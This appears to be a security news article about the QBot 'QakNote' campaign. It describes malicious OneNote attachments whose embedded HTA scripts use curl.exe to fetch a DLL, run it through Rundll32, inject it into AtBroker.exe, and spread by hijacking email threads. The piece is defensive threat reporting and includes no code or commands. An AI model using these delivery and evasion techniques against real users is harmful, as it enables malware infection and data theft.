A novel QBot malware campaign known as “QakNote” has been seen in the wild since the end of last week. This campaign infects systems with the banking trojan utilizing malicious Microsoft OneNote’ .one’ attachments. A former banking trojan known as Qbot (aka QakBot) has developed into malware adept at gaining initial access to computers, allowing threat actors to install additional malware on the infected systems and carry out data-stealing, ransomware, or other operations across the entire network.
Microsoft removed malicious macros in Office documents in July 2022, giving threat actors fewer ways to run code on targets’ computers. OneNote attachments in phishing emails have since developed as a new attack vector to replace these macros. Threat actors can incorporate nearly any file type, such as LNK or VBS attachments, when making malicious OneNote papers. When a user double-clicks an embedded attachment in a OneNote Notebook, they are carried out.
Users must be persuaded to click on a specific location to open the embedded file, which is typically accomplished using a “Double Click to View File” button or some other call to action. Once activated, the embedded attachments have the ability to run commands that download and install malware on the local system.
Security researcher Andrew Brandt reveals in a recent analysis from Sophos that since January 31, 2023, QBot’s operators have been testing this new distribution technique, employing OneNote files that feature an embedded HTML application (HTA file) that downloads the QBot malware payload. Max Malyutin, a researcher at Cynet, tweeted for the first time about this change in QBot’s distribution on January 31, 2023.
The legit curl.exe program is used by a script in the HTA file to download a DLL file (the Qbot malware) to the C:\ProgramData folder, which is subsequently run by Rundll32.exe. The QBot payload injects itself into the Windows Assistive Technology manager (“AtBroker.exe”) to hide its existence and avoid detection by AV products operating on the device.
According to Sophos, the operators of QBot use two different strategies to distribute these HTA files. One involves sending emails that contain a link to the malware .one file and the file that employs the “thread injections” technique. With the latter, a particularly challenging tactic, the QBot operators hijack pre-existing email conversations and send its members a “reply-to-all” message with a malicious OneNote Notebook file attached.
The threat actors deploy a fake button in the Notebook file that, when clicked, launches the embedded HTA attachment instead of downloading the document from the cloud, making these attacks even more deceiving for the victims. There is a probability that this activity will cause the victim to get a warning dialog informing them of the dangers of executing attachments. Sophos advises email administrators to consider barring all .one file extensions because they are rarely transmitted as attachments to safeguard against this new attack vector.
